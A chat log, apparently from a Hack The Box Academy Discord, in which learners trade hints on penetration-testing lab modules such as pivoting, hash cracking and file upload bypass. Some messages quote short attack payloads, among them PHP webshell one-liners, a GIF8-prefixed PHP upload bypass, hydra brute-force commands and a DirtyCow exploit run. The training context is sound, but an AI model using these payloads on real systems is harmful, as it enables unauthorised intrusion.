#modules
so I need to change all the variables ?
No, just that one.
It's on line 261 of the script.
You can open it with VS Code, skip there and make the edit.
Module: Service Authentication Brute Forcing
[ERROR] target ssh://83.136.250.104:22/ does not support password authentication (method reply 4).
I am receiving this error, in this given module
thanx
Can I please get a hint on "Footprinting" Host Based Enumeration - DNS. I'm stuck on What is the FQDN of the host where the last octet ends with "x.x.x.203"?
I tried enumerating using dnsenum seclists 5000 of the top 1 million domains, no dice. I tried an iterative script that did dig -x for 10.129.[1-256].203 with no results. Now I'm enumerating using dnsenum again but with the 110,000 top subdomains but I'll be waiting for a while..
BTW, did you try to use Kerbrute?
Because I think I need a user list for that (which makes it kind of difficult since there are "2913 accounts")
You have to find all the zones.
Since you don't want to send the NameServer straight to nirvana, use the smallest list under SecLists. 5000 entries are too many 😉
Thanks I'll modify my approach, poor server is already in Nirvana for sure.
You're welcome, fixed yeah?
I prefer to just use crackmapexec(netexec) if you know pass pol
Haven't done that module yet. But I prefer to gather users with rpcclient and spray with nxc
I barely use kerbrute.
yes, you were right on the spot
well in that specific problem gathering users is a bit of extra work, so using "DomainPasswordSpray" makes it easier
also in the long run it's better
Yeah the first time it is, but I have a sed command that cuts out everything else and leaves just the usernames in the straight brackets from rpcclient
Guys which is the best module for beginners
It is best to start with the Information Security Foundations path.
How many modules can I use at a time?
Linux Fundamentals, Windows Fundamentals , Introduction to Active Directory and Introduction to Networking are also all good.
Penetration testing Process is too
Oke then
@fathom pendant I found out something interesting yesterday, I am telling you this for future instances, in case you don't know it: You can set the timeout on SMB for bigger files: smb: > timeout <n> (n is the amount of time you wish to set).
Hi guys. Currently trying to complete the 'Windows Fundamentals' module and I'm on the skill assessment. I'm up to the step of creating a local group, however I keep getting 'system error 5/access denied' when I try. Would anyone have any hints as to what to do next?
I've tried adding myself to the administrators group, giving myself full permissions, but I'm once again met with the same error.
Thanks @acoustic owl a good reminder to branch out into different lists, I really thought if it had 5000 it had them all!
can i get help with this please
You post a random screenshot without specifying the module, section, question and what doesn't work?
How is anyone supposed to help you?
Module: Service Authentication Brute Forcing
[ERROR] target ssh://83.136.250.104:22/ does not support password authentication (method reply 4).
I am receiving this error, in this given module
posted that before the screenshot^
hydra -L bill.txt -P william.txt -u -f ssh://83.136.253.251
this command doesn't work because apparently the ssh service on the machine I'm supposed to brute force with hydra may have been set to "no password"
I did try resetting the machine, mind you
What question do you need help with? There are two questions
The first one
I know I'm supposed to brute force one user, but that doesn't work either
With this task you get a Docker container. This means that you must always use ip AND port.
By the way, the username is already given to you. Look at the question again.
tried with that username, got the same result
Because you are attacking a random machine on port 22. But the port is predefined for you. You must use this port
so the IP of the target is a random machine?
Hi @clever bronze I just spun up the target in the module and tested. If you are unfamiliar with UAC prompt, make sure you are getting one before you create the group.
Your destination can only be reached via this port. Everything else is not your target server
No, it's a computer with theoretically thousands of Docker containers.
Your container, i.e. your target, can only be reached via the specified IP:port combination. Everything else is not your target server.
because it's a docker container
It’s a clear question, and it clearly states the target. You just don’t read 😌
^
that port is mapped to the internal port 22
maybe, maybe not. You can run SSH on every port you want
ok
ok thanks lawless, gonna try again with fresh eyes tomorrow. Appreciate the time you took to reply
It is actually well described here
i will keep that in mind, i forgot 🙂
no worries you'll be a proficient windows administrator in no time.
I have a question regarding the "Active Subdomain Enumeration" module. I completed all the answers but I'm not entirely sure if the rationale behind each step is correct. Could someone go through the notes I wrote and confirm I've correctly understood each question, and how to approach it?
Wsg y'all.
Password Attacks - Hard Lab - I have been trying to dump the sam hashes, but no success.
Anyone got ideas?
p.s - Already mounted the .vhd and cracked the bitlocker hash.
I tried secretsdump and samdump2.
Hello, I have a question. Does hackthebox's training refer to modules?
Solved, I am just brainless.
Thank you. Turns out I rolled the local admin pw in an earlier attempt, that ended up modifying the hash i needed for the answer. Went down a few rabbit holes on this one, but a good learning experience. Thanks again. 🙂
Here's a question about not any one particular module, but rather all of them. Would anyone be willing to share their note-taking/report drafting "flow"? I'm still pretty early on, and I understand the concepts and importance of note taking. However, I'm curious how you guys are taking notes in a way that isn't interrupting your current thought process or clunking up your attack process. Hopefully that made sense?
Sure, basically I do note taking in 2 different ways:
Theoretical and practical. The most important info that regards examples of usage and concepts are going to my theoretical document which takes into consideration a whole module - So 1 .docx theory.
The next one is a practical .docx where I have taken screenshots of the way I have gotten to the flag.
And finally, I make a file on paint3D (doesn't really matter) where I draw the chain/attack vector.
So there's 3 types of documentation I do.
I can provide you with an example in DMs.
Of the way I take notes down.
Thanks for sharing! Right now I seem to just "get in the zone" and push through a machine/exercise, and taking notes becomes an afterthought rather than an active part of the engagement
All good, man. Ping me if needed.
I think I just need to get in the reps of note taking for it to become part of my process
Yeah.
note down the commands at the end of each attack chain/major step, then you can flesh it out afterwards; the commands themselves will be enough to help you remember what you did
^ ( extremely important)
Someone made a file specifically with these commands.
https://youtu.be/dRW1Gxmu__Q?si=srPbY-NIIGuV9nov This is guide for CPTS but has high emphasis on note taking.
Istg I am gonna get that CPTS and hang that on my wall.
I think you'll benefit a lot moving to a proper note taking application, I use obsidian with the excalidraw plugin to make network diagrams and attack chains, everything is done inside one app
can't imagine using MS Word for notes
I can see the ||code|| ,and with ||iframe|| I can extract most of the ||orders in the xml|| except for some ||comments that are arrays||. I also tried ||ssrf with interactsh, as an alternative to iframe for exfiltration||, but it failed, so I am left with only ||iframe for exfiltration||. Am I on the wrong path ? If yes could you give me a hint ?
Ehh..I prefer cherrytree.
yeah that's fine, anything but ms word 
In the module Shells and Payloads I was trying to follow the Laudanum demo, but I can't find the webshell, I just get 404s. (\files\shell.aspx)
I also attempted \files\shell.aspx
it won't let me put 2 dashes, but I did attempt that as well lol
Change direction of slashes?
I just redid this one the other day and got it just fine ¯\_(ツ)_/¯
I tend to dump everything in Notepad++ while I am attacking, then move it to CherryTree after and clean it up there. I was using Obsidian for a while, it was great too.
It's extra work, but it's the way I am lol
Hello could someone help me with the HTTP Response Splitting Section of the HTTP Attacks Module?
@kindred jewel i had to run powershell as admin 😩
You need to try ||xpath injection||
Of course I'm doing it already, that's how I extracted stuff, but this doesn't answer the questions I am stuck on, which are: am I exfiltrating correctly, and what data am I missing in the exfiltration? Please check my previous comment again
The way you've framed your message doesn't even whisper the ||xpath injection|| all you've been mentioning is iframe. What you can see from iframe is limited. I don't understand why you're even trying to ssrf with interactsh. You can forge your injection query to just get what you're looking for if you're already trying ||xpath injection||
Using the iframe is correct, however look through the XPath - Authentication Bypass section again as there is a method to exfiltrating data from there, you may need to modify the payloads from there however.
Ok maybe I'm overcomplicating. Sorry if it wasn't clear I'm trying not to spoil too much, I thought my mentioning of the ||xml orders and array comments|| made clear I was doing || xpath injection|| already
I didn't understand what array comment meant, I'm still new to this stuff myself. But you don't need to overcomplicate. You said you got the code, and I'm assuming that's the source code of the internal application, correct?
Yes exactly (there are some ||comments that are xml arrays|| in the exfiltrated data, but maybe it's irrelevant)
I don't remember seeing any valid code being commented out. But, any case yeah, that's irrelevant.
What should be relevant is only the line of code which takes user controlled input.
ok (I meant ||nodes named "comment"||). I was definitely overcomplicating it.
Thanks ! it helped
no prob!
The odat docker image doesn't exist for my M1 CPU... I just hate this module so much xD
Hello. I'm stuck on the Linux module, I have googled, read manuals and tried the best I can.
The question is: How many total packages are installed on the target system?
section?
You mean this? File Descriptors and Redirections
did you try apt list --installed?
yes
look at the first few lines of the output to adjust the number
Hello, I have a stupid question regarding the authentication coercion chapter in the NTLM relay attacks.
For instance, are the Rpc methods used(RpcOpenPrinter, RpcEFcDecryptfile, ...) implemented server side or client side?
server side, it coerces a server into initiating an NTLM auth with your listener
can't figure it out...
apt list --installed | head what do you see?
a warning. And why "| head"? I thought I should use "| wc -l"
because I want you to take a look at the first few lines of the output, you see the extra line there?
there's one extra line before the packages are listed, just -1
@next bronze so those are the names of the methods implemented on the server, and then they get called from the client?
oh ok thanks!
here is what i have tried
oracle-instantclient-devel and oracle-instantclient-sqlplus can't be located, has anyone come across this issue?
yep, from the coercer repo
Tries to connect on a list of known SMB pipes on the remote machine
Calls one by one all the vulnerable RPC functions to coerce the server to authenticate on an arbitrary machine.
How to find maker of a module?
aka Introduction to Digital Forensics
It should show you under the modules details
gotcha, I was looking at the module completed page
are those their discord handle?
I wanna reach out to them to ask for the intended solution
I know few of them that have it the same as their discord handle. Not sure about everyone else.
looked for those names at the search function for this discord but found nothing
volfar, leoleg97, MadhukarRaina
Hey guys, I'm trying to download the OpenVPN file so I can do some hacking challenges, but how do I actually get the file into my VM in the first place?
volfar is in the server, but not sure about just dming
download from vm directly, set up a sharing between host and vm
hmm, which thread should I ping him on?
yup I overthought it
oh nvm idk how discord works, I can't do @volfar
@next bronze thanks a lot.
I wasn't sure
I have no clue, they don't have any messages on the server 
Who on this earth could shed some light on this accursed DFIR module question? lol
maybe I'll message support
Hey all - I am trying to run msf for the Attacking Common Applications module, for the section Attacking WordPress. I am trying to get the flag and use this method... but the payload doesn't go through at the end... any advice here?
I swear that when I click on reveal, "harder" would appear
Lmao
BROKEN AUTHENTICATION ---> Skills Assessment - Broken authentication, I have decoded the cookie, but when I place the user support cookie, it tells me this, can someone help me?
I have fuzzed for the user admin, administrator and others but it tells me that the user does not exist...
don't see an option to send a message to support
anyone on assistance with the above ask for the section attacking wordpress under attacking common apps module?
writing a webshell into a theme would be easier than using msf
probably because it's holiday season, you can still email them
it said for critical urgent thing, email, I'll just wait lol
I agree on the webshell written to theme
@next bronze
does it matter which i use?
||system($_GET[0]);
system($_GET['cmd']);|| and then i am assuming i can just curl the file?
super simple and lots of webshells to choose from out there
if you are able to write it into a theme you should be able to browse that path and have a webshell to use. I have not made it to that section but that is how I have done other boxes. I dont see why this would be any different
^ this, and it doesn't matter what you use as long as the parameters are passed correctly
I forget the specific webshell that I have seen people use here but there are a lot of them
its nice and looks like a terminal. Really well made
ok...wasn't sure if it mattered much, but thanks..will go from here and see
p0wny-shell? probably too long to write into a theme, the most basic one liner will do
In Footprinting/Oracle TNS I was able to upload a reverse shell, login and enumerate. Now my Pwnbox died, and I can't get odat.py running again. Can someone please give me a hint? Do I even need to get a reverse shell and manually dig in the machine?
Guys, I'm trying to pwn the Dancing box in the Starting Point module and I'm so close to finishing, but for some reason I cannot connect to WorkShares, can anyone help?
iirc you should get a set of creds from odat then login to the db and find the answer
yes I got the creds, I tried DBeaver, but just blank entries, sqlplus doesn't work on my machine
not sure about that, I used sqlplus, use pwnbox then
I believe sqlplus is needed but it's been a minute
it doesn't find dependencies for sqlplus when running the installer script provided
oracle-instantclient-devel
oracle-instantclient-sqlplus
can't be found with sudo apt install ....
try running apt update first
Because it's its own virtualized web instance
2hard
so oracle-instantclient-devel is in the Kali deb repo but not Parrot
no way, I'm not gonna deal any longer with this bs, I wanna exploit and not fix tools xD
I'll skip this Oracle TNS, spent nearly a day on this crap
you got the creds right?
ya
dm
IPMI is interesting, never heard of it before 😮
Hello guys, can someone help me with the Broken Authentication module, on Brute Forcing Passwords?
I understand all of it and, as said, we need the rockyou-50, but there is only one password matching for it and this is not the right one... maybe someone can tell me what I'm doing wrong
I tried to extract the service hash for the MSSQL database. I am trying to crack it using -m 1000 and the pws wordlist provided in resources. I still cannot crack it. Any advice as to what to do now?
That's not the right hash mode
are you bruting the right user/page? if you have found the pass it should be the answer
The module mentions what kind of hash that is and which mode goes with it
no, brute forcing is also not working. But as the question says, I expect at least the password in it with the matching criteria? Or am I wrong?
that's not the right password, find the password policy by creating an account
can I write you a PM? Don't want to spam everyone here
So I followed a blog for ntlmv2 hash crack got the mode but I am getting separator error
Hi guys I'm stuck on password attacks lab - medium. I've both creds of Jason and Dennis ssh, any hints on how to get root?
with Dennis you mean?
yep
you need to specify an attack mode -a 0 for wordlist
yeah I've already cracked his id_rsa
then ssh with it
I did
you are on the right path
use the ssh key to log in
try to log in as that
oh ok
got it! thx
It accepted the hash but I still could not crack it. trying rockyou
rockyou also did not work
If anyone is available to chat about the "CrackMapExec Skills Assessment" I'd appreciate it. Stuck on Q3...
module and section?
Module attacking common services
section attacking sql databases
Also take a break if you are feeling that you are hitting a wall
Doing everything on autopilot is not something that I would recommend
iirc the WP site is served on a vhost. That might be why it didn't work.
But either way it's too easy to whip out msf. Just use a plugin or theme.
it should be in rockyou, make sure you got the right hash, capture it again
I enumerated with the cred provided in the section. discovered 2 databases hmail and flagdb
I tried to access them but could not
I tried to look for people to impersonate. there were none
I then tried to extract the ntlmv2 hash and this is where I am
I have tried to crack the hash in -m 5600 with wordlists provided in the section and rockyou.txt both resulted in nothing
I captured it again got a different hash but that too did not work
but both the wordlist did not provide any results
I even tried the user wordlist provided in the resource
might be how you're copying it, copy the full hash, then use a text editor to paste it in
The $ points to the EOL and there is no space at the start
got the pass
I used the wordlist at /usr/share/wordlist/rockyou.txt
Module: Linux Privilege Escalation
Section: Kernel Exploits
downloaded the exploit and ran gcc kernel_exploit.c -o kernel_exploit && chmod +x kernel_exploit but can't run it... even with sudo
that wordlist only has 333 passwords in it
and it worked
i mean as root
─(root㉿kali)-[/home/kali]
└─# ./kernel_exploit
error: Operation not permitted
why is this operation not permitted?
got it?
yes
The small rockyou worked and the seclist rockyou failed guess both are different
oh I meant the rockyou you used originally only had 333 password in it
the one you used should be the big one
I have a question. the 'Database user' they are talking about...are they talking about the user that I submitted as an answer to the third question of this module:
"What is the password for the database user? "
Nevermind
Is there anyway to do the shells & payloads live engagement from your own personal vm? If not any tips on speeding the lab up a bit?
pivot through the 172 machine
reverse shell to my own vm?
i had not this issue, try other directory
htb-student@NIX02:~$ ./kernel_exploit
./kernel_exploit: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.33' not found (required by ./kernel_exploit)?
what do i do about this?
compile it statically
wait, you were doing it on your machine which is patched, makes sense
gcc -static -o kernel_exploit kernel_exploit.c
like this?
so I got htb-student@NIX02:~$ ./kernel_exploit
usage: dirtyc0w target_file new_content
thanks... i will try to figure it out from here
nevermind
be more confident about your skills
at the end you were doing it by yourself
🙂
Footprinting / Assessment Easy
The hint says to keep in mind that an SSH key needs specific permissions.
So I think I have to get the private key, which may lie on the FTP.
Anonymous login is not possible, but with the given creds (the server doesn't show me files).
There is ftp on port 21 and ccproxy-ftp on 2121 on the system.
I don't want to use brute forcing or a Metasploit module for now.
What steps would you guys take?
scan both tcp & udp😉
yeah got some udps too
53, 68, 623, 28493
I already tried 623 for brute forcing IPMI
Is the Citrix Breakout (Windows Privesc) unstable for you guys ? It keeps crashing before i can do anything...
On the pivoting, tunneling, and port forwarding skills assessment, how am I supposed to find the right IP address for the username I found on the pivot machine that starts with v?
CME, check out password attacks
enumerate is always the answer
I did use some dig to get the zone file, got some IPs, but which 3 should I test?
test all of em
but I do not need to use dnsenum, right? Because they say it's a production server and I'm not allowed to use exploits/brute force. So I'll just test different stuff like mail login on those IPs found by dig?
If I had to use proxychains to RDP into a machine, how do I transfer files with SMB if there is no path to my attack machine?
Is there a way to do the transfer with proxychains?
I tried using impacket-smbserver and then on the target machine I put in "net use n: \10.10....." and it is telling me that there is no path to the network.
This is the error I received
Basically I'm trying to get the SocksOverRDP zip folder onto the target machine in the skills assessment for pivoting, tunneling, and port forwarding.
rdp has built in file transfer capabilities
mount a drive over rdp, if you want the internal host to be able to reach your attack machine you need to set up a reverse tunnel
or if you have a cloud vps send files there and from victim use scp or wget or something 😄
we're talking about the module lab, which wouldn't have net access
so in the real world sure that's viable, but not here
ah got it
Okay, I found someone had used the /drive:linux,/home/kali method. Was this covered in the file transfers section or is this just something I should know?
I went back and referenced that section and didn't see anything.
Or was it in this module?
it's under Miscellaneous File Transfer Methods from the File Transfers module
Oh sweet, thank you. I even looked in misc, but must have skipped over it.
How do I find the IP of the user with the first letter v in the username.
this was answered, spray/enumerate it
I'm not sure how. Can I nmap over proxychains in this case?
you can proxychains anything that makes full tcp connections using standard socket libraries
i.e yes
This is what I have so far prior to starting nmap, which ip should I be using, the 16.6 or 16.5?
finally I got the god damn SSH key for the Footprinting - Easy lab
I guess I mean which subnet?
I'm on 16.5 currently, but I don't really understand this output.
I got nothing on proxychains for 16.6, and 16.5 is the same results as before.
I mean this is an element you need to figure out. You should understand subnets as a course pre-req
I understand subnets, I'm just not sure why this is set up the way it is.
This one is hard.
I'm not getting any results though on proxychains for 16.6. Will this even work for that subnet?
Nobody can answer that for you
you should have your own map of the network and how your proxies are setup. This map can be mental or it can be literal
Why not? I'm pretty much stuck.
Because it's a skills assessment
guys, am i wasting my time learning if If I'm not good at this
It's assessing your skill, not your ability to ask others to solve it for you
Or I'll put it another way: if you're so stuck you cannot figure out this step without help, then I guarantee you will fail the exam. This is mandatory knowledge and a needed skill.
I keep flying through things easily until I get to the assessment, @analog charm. I am stuck on the very final part of the File Upload Attacks. I got through everything else, but now I just cannot get the final item up. You are in good company. We all start somewhere.
It's normal to get stuck
Being able to push through and figure it out separates the people with no capability and those with capability to succeed
Thanks for the message, hope you get unstuck in the file upload attack
❤️
finally, that EASY lab wasn't easy imo xD
As a mode of encouragement, hack the box easy, does not translate to the definition of the word easy most use.
footprinting?
Thank you. I have been at this last item for about three hours. If anyone wants to help and tell me why I cannot get the darn image uploaded like I could on all of the other ones, that would be nice
Okay, I figured out proxychains is not working for some reason. I am able to ping from cmd on the pivot host and get two ip addresses, but they timeout with proxychains.
I feel like they used the box convention of difficulty = steps needed
No I pinged from CMD on the pivot host
yes: f0x just explained WHY it doesn't work through proxychains LMAO
proxychains can't proxy ICMP traffic
^
Wish I could help you, but I really don't know, so I can just hope it gets better for you
ye
Google how to use nmap and proxychains.
No worries, thank you though. Just breathe. I know that sounds cliché, but breathe, walk away if you need to, but breathe
definitely for footprinting (and the skill assessments in general) read the god damn brief
it helps to at least know a portion of the services we might be encountering :)
yes this will obviously not return anything
I'm just using what was in the module
-sn is to not port scan, so it has to use icmp or stuff like port 80 for host discovery
yeah imo they made a rabbit hole with all the open services, and they say in the brief to collect as much data as possible from DNS, but that was not needed at all 😄
and ICMP doesn't chain through proxychains
literally the sentence after that explains why this won't work
you cant copy paste through stuff
So what is the enumeration method?
read the section
I didn't copy and paste, I changed the IP and range to cover 1-255
....
you're running commands and flags without understanding what they do. That's copy pasting
I do need some direction, please. I know it is an assessment, and I do not want the actual answer, but for the File Upload, all I can seem to do is the SVG stuff. Everything else is giving me a message about it needing to be an image.
Only images are allowed
That
I even tried the -Pn scan and it didn't work either for port 3389 or any other port for that matter.
well what conclusions can you draw from this
"One more important note to remember here is that we can only perform a full TCP connect scan over proxychains. The reason for this is that proxychains cannot understand partial packets. If you send partial packets like half connect scans, it will return incorrect results." < from the section you screenshotted
- that host doesn't exist
- that subnet isn't where you should be looking
- your proxy doesn't reach the subnet
- you did a SYN scan, not a connect scan
use burp to change content header, find non-blacklisted extensions as the hint says
- the host firewalls those ports
I did, I am pretty sure anyway, lol. I have the SVG items, it is just this dang final part to create the shell that is beating me now. No matter what file extension I use, I am getting Only Images are allowed
That I can ping from the pivot host from CMD and get two IPs. I ran a script to ping all of the 172.16.6 IPs and got two. So I know one of them is the one I need. I am just going back to figure out how I could have done that using the methods taught thus far in the modules, because the script I used was just something I found online. I'm trying to reinforce my knowledge of the methods taught, not use workarounds.
upload a valid jpg/png to bypass the front end validation, test extensions that can bypass both blacklists and whitelists -> think of ways to bypass the content type filter -> think of what you can do with an SVG -> attack it like a whitebox after this. - It's easy, just calm down and go over it again.
cool, so with that knowledge examine which scenarios still remain plausible
you can't get a reverse shell, it's a docker target
Okay, I will calm down. I did get the SVG items. That was the only easy thing, lol
I am trying to use something from the modules to solve this. It's frustrating because now I know the answer, but can't find it with any of the methods taught on HTB.
you're not paying attention
^
think of why that is happening? is the application recognising only one part of the extension?? return to the sections and understand this and apply.
The instructions say that we need info and other parts of the lesson showed how to create a shell. "Try to exploit the upload form to read the flag found at the root directory "/"" oh well, I will try
yeah a webshell is ok, not a reverse shell
You can use a webshell, all you need is to read a flag. Worry about getting a shell later XD
To what?! I already know the answer, but I got it using a different method. I would like to know if there is a valid way to do this with the course material, or if it's one of those classic HTB Academy "great you figured it out even though we didn't teach that material" scenarios.
there is no classic "we didn't teach that material"
I'm trying to make sure I didn't miss anything. There's a lot of material here.
It's there, calm down and go over it again.
you're just not understanding the material and then getting surprised when you don't understand the answer
and then blaming HTB
again
I already have the answer
How do you think I figured it out?
Do you think I guessed?
Do you think I used methods outside the course?
Did you use a ping sweep or something from the module? If so, what module?
Cause I didn't. I had proper fundamentals and understood the material when it was taught
nmap and the pivoting module
You two should duel...
there is a really helpful nested for loop script in that module, you can use that to solve all the sections without even thinking; all you gotta do is tweak it with more extensions, fuzz and spot the responses.
😂 frfr💀
I'm just trying to prove a point that one's own misunderstandings can't constantly be blamed on others
I don't disagree with you
He doesn't get the material, doesn't get the tools, and then complains that HTB hasn't taught him correctly
which pivoting module?
I do not even recall any loops. I will try in a bit. I am getting annoyed that I have been on this one for like four hours and I know it has to be something simple
literally the one you're doing
I think you're meaning to ask "section"
I started this skill assessment; after an hour of trying to get in I realized I was using the wrong upload button (the submit button). Sometimes you need to take a break and return with the mentality of killing the section. - In around 2/3 hours I was able to solve it
Yeah, probably section
"probably"? I'm making an assumption for you to clarify - not to say 'probably'
Yeah it froze earlier so I reset
No specific section, understanding taught concepts
Thank you. I had a similar issue with another module recently, it made me feel like I was going bonkers
So I'm assuming the module would be this
This was after taking a 4 hour nap because I realized I was drained.
yes
and then these are the sections
correct
Module > Sections
I'm just trying to figure out what section then
no specific section
All the best!
all the sections are different tools for pivoting
The concepts are the important piece
you need to piece things together conceptually
I know I'm missing something and I could use a hand, it seems like everyone on here is so combative.
Thanks, I am just sick of the "Only Images Are Allowed"
😂 not really
I just want to know what I'm missing
Because every time someone tries to lead you down to figuring out the answer you start crying about not being handed the answer or that HTB didn't teach you it, just 'cause copy pasting doesn't work
and when told that lack of fundamentals is likely the core issue, you claim you have the fundamentals
This exact error is a dead giveaway on what double extension to use if you pay very close attention to the section on whitelists 😅
it's combative because you rarely take responsibility for your own struggle
I thought it was the one with the regex, but I could not remember. Also, should I be getting that error if it is just named jpeg or gif with the GIF8?
every time madfox starts this, I begin to ask myself if I really know the fundamentals 🤣 cause dayummm
I listed multiple scenarios that could be causing your issue in proceeding, and you dismissed a couple of them (which, good! you should be eliminating the unlikely scenarios first!) and then you gave up and didn't acknowledge any of the others or try to troubleshoot those scenarios
So I am convinced that there is no other way to do this portion of the skills assessment without using the ping method directly from the pivot host from the CMD line.
I think most of your replies are the way they are because of the experience/insights you have gained from the exam and you be like "The exam is wayyy harder than this man, you gotta brace up and figure this out without a handout" 😂
And I told you that's wrong
I've literally said this 😂
I found the command on the forums when I got stuck
It's giving...
Hello everyone. I came here because I was stuck as well. I did the ping sweep and it kept coming up with just the IP I was currently on. I think the wait time for reply is not long enough, because right away when I straight up ping 172.16.6.25 I got a hit. So if you're stuck, try pinging that and trying what you got for credentials. Also things ...
and I totally understand that 😂
It's actually my self portrait
The ping sweep worked, and I don't see anything else that would work besides that.
I'm not going to post it because I'm pretty sure it would be a spoiler.
It would, and congrats for cheating yourself once again
Gonna be real useful for the exam
the one that starts with "for /L %i in..."
Password Attack Lab - Medium
Everyone previously in the Discord has said they need to get to dennis for root access. I have no idea how they got this info, as I'm currently logged in as ||json in the mysql|| and see dennis but not sure how you're supposed to know to use him
I'd advise you make a cheatsheet and specifically a section of techniques to find live hosts on a subnet
This was in the module for cmd.exe iirc
it's called logical steps: if nothing else is working, why not
you get creds, so why not just say 'Fuck it' and try them
So you're saying I'm right and there's no way to do it with proxychains? I'm confused.
This is the skill assessment for pivoting/tunneling you are struggling with right?
I get that, but there's at least 100 different creds in the database
yes
yes; and i would also implore you in the future to look at /home/
and he's struggling with host discovery through proxychains
Did you try pivoting or tunneling. 😄
LMAO
Alright ty
I'm telling you for a fact I didn't use ping
first thing I do when I gain access to a system is check /home/ (or for Windows C:\users\) and see if /root/ is left improperly managed
Then what did you use? Feel free to DM me if you want to avoid spoilers.
I actually already told you when troubleshooting your issues
^
I feel like I've tried everything and I'm stuck
Ahh I just checked and found dennis. Thanks for that tip, i'll include it in my notes
well, I'm not stuck, I have the answer, I just want to know the other method
or rather I was leading you to solving it but you started ignoring any advice I was giving lul
I'm saying: know when to use which, understand why one technique wouldn't work, pick which is more efficient for you. e.g. I don't use PowerShell for live host discovery because all the for loops I have found take forever. It's clearly stated in the modules that you can only use proxychains+nmap with a connect scan -sT; proxychains is bad at handling half scans (incomplete packets/connections)
understand how nmap works, check that you're actually proxying to the subnet correctly, then craft a correct nmap scan
I tried nmap with proxychains, unfortunately it did not work.
it's that simple
and I used the 17.6 vice 17.5
you tried nmap with the -sn flag
No, you tried nmap with proxychains incorrectly and it didn't work
Yeah then I did the -Pn
and you also never confirmed that your proxy was correct
proxychains nmap -v -Pn -sT 172.16.6.1-255
and you're proxying how
and I am already in with proxychains through rdp for the first host.
I used ssh -D 9050 for the initial one
then the proxychains xfreerdp
So am I missing something?
Okay, if I could get one question answered: why am I getting "only images are allowed" when the file is just shell.jpeg and Content-Type: image/jpeg
Regular images are uploading
I'm not really sure what your actual question is at this point to be honest
it probably checks for magic bytes
what is the content of your "shell.jpg"?
Essentially.
any of you guys here working in the field?
"File signatures"
go back to the Type Filters section
I did try gif and GIF8
and if that didn't work, try other formats
It should work, I recall getting it done that way.
That was the first thing I tried. I will try again. Wish me luck, lol.
I did try to upload an image with a double extension and that did work, so it is the file itself.
So proxychains did not do it for me. After rereading the whole module (not just the section) I found this
This is what I have
Content-Disposition: form-data; name="uploadFile"; filename="test.phar.gif"
Content-Type: image/gif
GIF8
<?php system($_REQUEST['cmd']);?>
and I am getting this
HTTP/1.1 200 OK
Date: Sat, 30 Dec 2023 01:29:57 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 23
Connection: close
Content-Type: text/html; charset=UTF-8
Only images are allowed
So I'm guessing nmap proxychains is not the method?
Can I get a hint please as to what is the correct method?
The correct method for WHAT exactly?
For getting the ip addresses for the 172.16.6 subnet
I already found them for the skills assessment in pivoting tunneling and port forwarding, but I was asking earlier about how to find them without pinging the pivot host.
Or I should say pinging FROM the pivot host using the cmd line in windows
I don't remember the section exactly but if gif doesn't work, try another format like jpeg
fuzz for allowed content type.
You're using the wrong one. Read the page source with "A method" and see why that's wrong.
I thought I had tried them all out. I am still not sure what magic bits are
I had just edited the source and removed the JS that was doing front end validation
I'd advise you only use valid image extensions always, use GIF only for magic bytes.
you can add jpeg magic bytes but gif is easier yes
I mean for content type sorry.
I mean the backend page source.
Okay I will try that again I never give up but today has been harder than normal
Revise the type filters section and Limited file uploads, use the content-type.txt text file there to fuzz. All the best!
There is a very satisfying feel when you figure it out yourself.
I know there is, but I am not sure what you mean with the other stuff, though I will reread. I am glad I got the svg all on my own
I will try. I am just sick of this darn "only images are allowed" no matter what I do. I think it has actually almost been five hours.
nmap over proxychains never worked. I finished the rest of the skills assessment though.
bummer. worked for me
Do you mind sharing which options you used?
I used proxychains nmap -v -Pn -sT 172.16.6.1-255 and directly to the ip that I knew it was.
Got a whole lot of this
Out of curiosity... where are you getting 6 from, and why?
From the pivot host
So, what are your tunnels.
When I connected to 172.16.5.XX
Think about this carefully.
Tunnels I used:
ssh -D 9050 -i id_rsa webadmin@<ip>
then I used proxychains xfreerdp to go to the 172.16.5.XX host
yup... and then what?
tip : ||its the content-type, read the web server php files.||
Thank you. I did copy both of those SVG file outputs into Obsidian, which I use for my notes.
I got into the RDP session and pinged the 172.16.6.XX range because proxychains nmap was showing everything as down in that range
I have upload.php and common-functions.php
cool from here its just spoilers.
I mean I first used the hint to get creds/username, but then that's what I did to find the ip for those creds/username
I'm all finished with the module now
I just want to know what the alternative method was to finding the other ip besides what I did.
so then can your pivot host reach the 172.16.6.0/24 subnet? or only the 172.16.5.0/24 host you rdp into can?
Think about what your tunnel is actually letting you touch.
I was able to complete the rest, so yes.
Everything was easy besides trying to get the IPs
That is not correct...
I used mstsc.exe and used the remote desktop connection, so yes I had a path.
It was finding the ip that was the issue.
Let's try this. Are you able to nmap the first subnet, i.e 172.16.5.x
you just explained why it wasn't working for you
you never proxied to the host. you used a different tool to complete the final hop
a hop nmap never had access to
^
I had issues with that and did a ping script from the ssh session
always remember the a <--> b <--> c's
you needed to setup a second pivot on the final host before your target
ssh -D 9050 -i id_rsa webadmin@<ip>
then I used proxychains xfreerdp to go to the 172.16.5.XX host
what else am I missing
Think about it...
if !b <-- c then a ! -->b -->c
the pivot for 172.16.5 to 172.16.6
instead you just connected directly from the middle host
think of the double pivoting module
you never pivoted a second time
You can reach 172.16.5.x from your initial foothold... there is a second pivot to 172.16.6.x FROM 172.16.5.x

which, oh hey, is one of the scenarios I told you could be at fault: your pivot was wrong
Yeah, I was able to use mstsc.exe to get the remote connection

you're missing the point
What is the missing step to find the ip?
brother
Are you trolling us hard rn?
you were explicitly told
that's what we've been trying to tell you
my brother in christ
you are tunneled to your attack vm from a, so you can reach b
you needed to create a second pivot for proxychains to tunnel to to reach the subnet
you never did a second tunnel from b back to a to actually connect the chain
I thought that's what the proxychains xfreerdp command does
I suggest you study some more networking fundamentals.
your first pivot host cannot reach the second subnet, try pinging from there since you have ssh

no why would you think this
no, the proxychains commands USES the proxychains config to connect to proxied networks
So why was I able to RDP and get to the 16.6 then?
it doesn't magically create new proxies
I'm so confused!
you rdp into b yes?
yes
because you used a rdp program from the host that had access
from that host you used rdp FROM THAT MACHINE to connect to C, but you didn't actually 'proxychain' your way to C, you just used what's available on the system
this is why I said you lacked subnet fundamentals and kept saying to create a map of the network and connections
but you never did, did you
if you set up the chain CORRECTLY you would be able to
1; scan the right subnet
2; xfreerdp from your attackhost directly to C
without needing to go to B then rdp from B to C
MarcieLee is correct
the double pivoting module is something you should DEFINITELY revisit
because it's basically this scenario
